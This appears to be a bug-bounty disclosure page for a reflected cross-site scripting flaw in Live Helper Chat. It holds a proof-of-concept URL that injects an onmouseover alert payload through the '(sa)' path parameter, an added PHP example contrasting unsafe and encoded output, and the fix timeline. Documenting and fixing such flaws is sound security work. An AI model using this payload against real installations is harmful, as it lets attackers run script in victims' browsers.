Cross-site Scripting (XSS) in livehelperchat/livehelperchat

Valid

Reported on

Apr 26th 2022


Proof of Concept

1) Log in to the web application
2) Navigate to the below URL
URL :- https://demo.livehelperchat.com/site_admin/system/languages/(updated)/true/(sa)/HEXX%22%3E%3Ca%20onmouseover=alert(11122)%3EDEXX%3Ca

[Images: Burp Suite request; XSS trigger in browser]

Impact

An attacker can execute malicious JS on the application :)
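
As an added example (not Live Helper Chat code and not the content of the fix commit), this PHP script shows how a `(sa)` path value like the one in the PoC URL leaves a double-quoted HTML attribute, and how encoding at output time keeps it inside. The function names and the hidden-input sink are assumptions; the report does not show where the value is reflected.

```php
<?php
// Added illustration; all function names here are hypothetical.

// Parse "(name)/value" pairs out of a URL path, the style used in the PoC URL.
function parse_path_params(string $path): array
{
    $segments = explode('/', trim($path, '/'));
    $params = [];
    for ($i = 0; $i < count($segments) - 1; $i++) {
        if (preg_match('/^\(([a-z_]+)\)$/', $segments[$i], $m)) {
            // The application sees the percent-decoded value.
            $params[$m[1]] = rawurldecode($segments[$i + 1]);
            $i++; // skip the value segment
        }
    }
    return $params;
}

// Vulnerable pattern: raw value concatenated into a double-quoted attribute.
// The sink (a hidden input) is an assumption made for this example.
function render_unsafe(string $sa): string
{
    return '<input type="hidden" name="sa" value="' . $sa . '">';
}

// Hardened pattern: encode for the HTML attribute context when writing output.
function render_safe(string $sa): string
{
    $encoded = htmlspecialchars($sa, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="sa" value="' . $encoded . '">';
}

// Path taken from the PoC URL in the report (host omitted).
$path = '/site_admin/system/languages/(updated)/true/(sa)/'
      . 'HEXX%22%3E%3Ca%20onmouseover=alert(11122)%3EDEXX%3Ca';
$sa = parse_path_params($path)['sa'] ?? '';

$outputs = ['unsafe' => render_unsafe($sa), 'safe' => render_safe($sa)];
foreach ($outputs as $label => $html) {
    // A literal "<a " in the markup means the value escaped the attribute
    // and created a new element carrying its own event handler.
    $intact = strpos($html, '<a ') === false;
    printf("%-6s %s\n       attribute intact: %s\n",
        $label, $html, $intact ? 'yes' : 'no');
}
```

Run with `php` on the command line: the unsafe rendering reports the attribute as broken, while the encoded rendering keeps the whole value inside `value="..."` as `&quot;&gt;&lt;a ...`.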

We are processing your report and will contact the livehelperchat team within 24 hours. a year ago
Remigijus Kiminas validated this vulnerability a year ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Remigijus Kiminas marked this as fixed in 3.99v with commit edef7a a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
AggressiveUser
a year ago

Researcher


@maintainer can I have a CVE for this report? If it's possible, please mention the @admin for it.

Jamie Slome
a year ago

Admin


Sorted 👍 The CVE should be published shortly...
